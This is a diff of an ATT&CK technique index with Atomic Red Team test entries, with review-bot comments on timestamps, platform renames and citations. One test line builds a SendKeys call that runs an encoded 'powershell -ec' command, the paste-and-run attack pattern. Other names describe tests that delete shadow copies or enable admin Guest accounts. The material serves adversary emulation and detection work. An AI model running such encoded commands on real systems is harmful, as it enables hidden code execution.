On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -95921,7 +96855,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -95971,13 +96905,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests:
- name: Windows - Delete Volume Shadow Copies
@@ -96246,11 +97179,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
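Review bot: `modified` for T1529 moves backwards, from 2023-05-09 to 2023-03-22, and the same regression appears below for External Remote Services (2023-05-09 to 2023-03-30) and Compromise Hardware Supply Chain (2022-05-24 to 2022-04-28), each time replacing a round `14:00:00.188Z` value. That pattern looks like a switch of source bundle rather than real edits; confirm it is intended, because any consumer that resolves duplicate objects by picking the latest `modified` will now treat the previous copy as the newer one.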
@@ -96315,7 +97247,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests:
- name: Shutdown System - Windows
@@ -96461,7 +97392,7 @@ impact:
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -96539,7 +97470,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -96635,11 +97565,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -96678,10 +97607,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
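Review bot: Office 365 and Google Workspace are replaced by Identity Provider and Office Suite on T1566.002 (and the same swap is applied to T1078.001 further down); any per-platform index, filter or test selector that still uses the old platform names needs regenerating in the same change, otherwise these techniques disappear from it without an error. A short commit-level note listing the renamed platforms would make this easier to audit.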
@@ -96698,7 +97627,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
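Review bot: the ACSC reference is repointed to a Wayback snapshot dated 20210708, but `Retrieved October 19, 2020` is left untouched here and in the identical change on T1566.001 below; elsewhere in this patch (FS-ISAC, TheDFIRReport) the retrieval date was updated alongside the URL, so either update it here as well or accept the inconsistency knowingly.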
@@ -96737,7 +97666,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests:
- name: Paste and run technique
@@ -96784,7 +97712,7 @@ initial-access:
[System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -96846,7 +97774,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -96863,7 +97791,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests:
- name: Download Macro-Enabled Phishing Attachment
@@ -96954,7 +97881,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -96968,7 +97895,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -97031,7 +97957,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests:
- name: USB Malware Spread Simulation
@@ -97058,7 +97983,7 @@ initial-access:
}
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -97133,7 +98058,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -97147,7 +98072,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests:
- name: Octopus Scanner Malware Open Source Supply Chain
@@ -97185,14 +98109,14 @@ initial-access:
name: command_prompt
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -97218,7 +98142,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -97273,7 +98197,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -97336,11 +98259,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -97355,6 +98277,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
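Review bot: the `+ x_mitre_attack_spec_version: 3.2.0` line added above `x_mitre_deprecated` is the same key that is deleted near the bottom of this object (after `object_marking_refs`), so the net effect is a key reorder, not a value change. The order is not applied consistently (T1199 in this same diff keeps `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` at the bottom), which means the generator emits keys in whatever order the upstream object has them and produces churn on every refresh; sorting keys on output would keep future diffs to real changes.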
@@ -97363,18 +98286,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
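Review bot: the platform list swaps `Azure AD`, `Office 365` and `Google Workspace` for `Office Suite` and `Identity Provider`, with the new entries appended after `Network` instead of replacing the old ones in place. Any per-platform artifact derived from this file that is keyed on `Google Workspace` or `Office 365` will no longer match this object, so check that the index generator emits the corresponding `Office Suite` / `Identity Provider` outputs in the same change; otherwise T1078.001 silently drops out of the per-platform views.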
@@ -97406,9 +98329,6 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -97480,7 +98400,7 @@ initial-access:
elevation_required: true
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -97491,6 +98411,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -97499,22 +98424,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
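Review bot: for T1199 the single `Office 365` entry is replaced by two platforms, `Identity Provider` and `Office Suite`, so the technique now appears under two platform views where it previously appeared under one. Confirm this one-to-two mapping matches the upstream object and is not a merge artifact of the reorder in the same hunk, where `x_mitre_contributors`, `x_mitre_domains` and `x_mitre_is_subtechnique` carry identical values before and after and only move position.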
@@ -97539,36 +98460,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
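Review bot: the T1566 description changes YAML scalar style (double-quoted folded scalar to a `|-` block scalar) in the same hunk as the text change, which buries the only substantive edit, the new clause about thread hijacking citing `(Citation: phishing-krebs)`. Other descriptions in this diff (T1189, T1078.004, T1566.003) are still emitted as double-quoted folded scalars, so either the serializer is not deterministic about style or this object went through a different path; pick one style for all descriptions. Also verify that `phishing-krebs` has a matching `external_references` entry on this object so the citation marker does not dangle.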
@@ -97597,9 +98501,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -97617,7 +98521,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
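Review bot: the `ACSC Email Spoofing` reference is repointed to a web.archive.org snapshot of the same path while its `Retrieved October 19, 2020` text is unchanged; that is the right fix for a dead link, but say so in the commit so it is not reverted later as a stray URL. The new `phishing-krebs` entry is a single-quoted scalar wrapped across two lines, which YAML folds with a single space, so the description loads intact, and its position between the ACSC and CISA entries is consistent with the list being ordered by description author.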
@@ -97655,11 +98563,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -97676,7 +98583,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -97686,7 +98592,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
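Review bot: the contributor entry changes word order from `Goldstein Menachem` to `Menachem Goldstein`; if the same contributor is credited on other objects in this file, they should all carry the corrected form, otherwise any rollup of contributors will count two different people.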
@@ -97695,19 +98601,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -97755,11 +98659,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
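Review bot: the unchanged context line `in that is employs the use of` carries an upstream wording error (`it employs`); because these descriptions are mirrored from ATT&CK the index should not be hand-edited, but it is worth reporting upstream so the next regeneration picks it up. The substantive change in this hunk is confined to the `modified` timestamp of T1566.004; the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines added above `atomic_tests` belong to T1078 and reappear here after being deleted higher up in that object, so they are a reorder, not new values.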
@@ -97779,10 +98684,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
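Review bot: T1566.004 loses `SaaS` outright here (`- - SaaS`) while gaining only `Identity Provider`, whereas the other platform updates in this diff keep `SaaS` and replace only `Office 365` / `Google Workspace`. If upstream really dropped SaaS for Spearphishing Voice this is correct, but it should be checked against the source object rather than assumed to be part of the rename, since it changes which platform views the technique lands in.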
@@ -97815,7 +98718,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -97854,7 +98756,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
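Review bot: `modified` for T1195.002 moves backwards, from `2022-05-24T14:00:00.188Z` to `2022-04-28T16:04:36.636Z`. The old value ends in the same `.188Z` millisecond suffix and round clock time as several other regressed timestamps in this diff (T1200, T1041, T1048.003, T1011.001, T1048.002, T1052.001, T1052, T1029, T1048.001, T1030), which looks like an earlier bulk re-stamp being replaced by each object's real upstream `modified` time. That is plausible, but a `modified` value that decreases will confuse any consumer that uses it to detect updates, so state in the commit message which bundle is now authoritative.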
@@ -97869,7 +98771,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -97949,11 +98850,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
